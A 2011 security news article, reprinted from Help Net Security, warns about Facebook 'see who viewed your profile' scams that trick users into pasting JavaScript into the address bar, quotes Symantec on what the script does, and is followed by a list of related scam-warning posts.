Facebook scammers know that in order to keep users falling for their scams, they have to use a variety of approaches.
For example, there was a time where rogue applications were the scammers’ preferred method of making sure that the scheme is propagated through the social network. Before that, they were more partial to trying to make the users copy/paste scripts into their address bars in order to achieve the same result.
As users become accustomed to ignoring one particular approach – and Facebook is becoming more adept at spotting and blocking the rogue apps – the copy/paste script one makes a comeback.
The most popular lure used by these scammers is the undying “See who viewed your profile” offer. The landing page could be a Facebook one or one hosted on another domain, and it asks the user to copy some Javascript into the browser address bar and press ?Enter?.
And just in case the user does not understand the instructions, the scammers have attached a video of the whole process. Once the directions are executed, the user is (predictably) asked to fill out a survey in order to finally get the results. In the meantime, the Java script works its magic.
“Depending on the configurations of the attacker, the script will post a new bait message to the user?s wall, send chat messages to friends, tag you in post messages or images, or even create an event and send an invitation to all your friends,”
explains Symantec.
“Of course as always the attack is easy configurable through a toolkit. Since the script runs in the context of Facebook and uses your open session it can do a lot with your profile, it can do nearly everything you could do yourself.”
Related Posts
- Cyber Crooks All Set to Crash the British Royal Wedding
As we have seen with many major events in the past, news of the British Royal Wedding is currently being used by cyber criminals to bolster their spam campaigns and push rogue antivirus software throu... - “Japan Earthquake Relief” and “Young girl commits suicide” Facebook apps
Below we have a rather fetching page located at helpjapan(dot)co(dot)tv:
Click to Enlarge
"Japan Earthquake Relief: Help raise money for disaster relief in Japan with a few clicks of your mouse".
... - Fake Facebook email
I received the email in the screenshot below just a short while ago.
It’s easy to tell it’s fake – just check out the URL behind the “3 messages” hyperlink.
... - Zynga Poker: Facebook Poker Account Confirmation. Beware!
If you receive a message like following:
Hello : [name]
Thanks for playing on Zynga applications.
We have reviewed the suspension on your account. After reviewing your account activity, it wa... - Van Gogh Museum hit by Facebook scammers
The Van Gogh Museum in Amsterdam is famous for having the world's largest collection of Vincent Van Gogh's drawings and paintings. But it has another reason to draw our attention today - scammers hav... - Fancy a new car anybody? Email scams continue to catch some
I was always wondering if, after so much has been told on the topic of Nigerian scammers, they could still be in the business and making money. Apparently, they can.
On my recent trip to Atlanta, US... - Facebook stalkers and profile creeps – rogue apps spread virally
Many Facebook users have contacted the Naked Security team this weekend, reporting that they have fallen victim to a fast-spreading scam that claims you can find out who is stalking you on Facebook an... - Fast-Flux Facebook Application Scams
Symantec -- It’s nothing new: a Facebook scam message about an application that appears to come from friends, such as something that can show you who has viewed your profile. However, this scam nags t... - White iPhone 4 offer and Facebook profile view count helps rogue apps spread virally
Last week I explained how scammers are spreading rogue applications virally over Facebook, pretending to offer you the ability to either see who has been viewing your profile, or count how many views... - Those Facebook “stalker apps”? They don’t work, so avoid them
"Stalker apps" on Facebook—apps that claim to show you who's been looking at your profile—are not real. We're telling you that up front because it's not quite obvious to the people who use Facebook,...
Posted on 08 May 2011. Tags: Apps, attacker, browser address bar, copy paste, Email, Facebook, fd, field group, images, invitation, java script, open session, Overflow, paste scripts, post messages, preferred method, Scammers, Scams, Symantec, Toolkit
The above information is reprinted from and copyrighted © by Help Net Security.
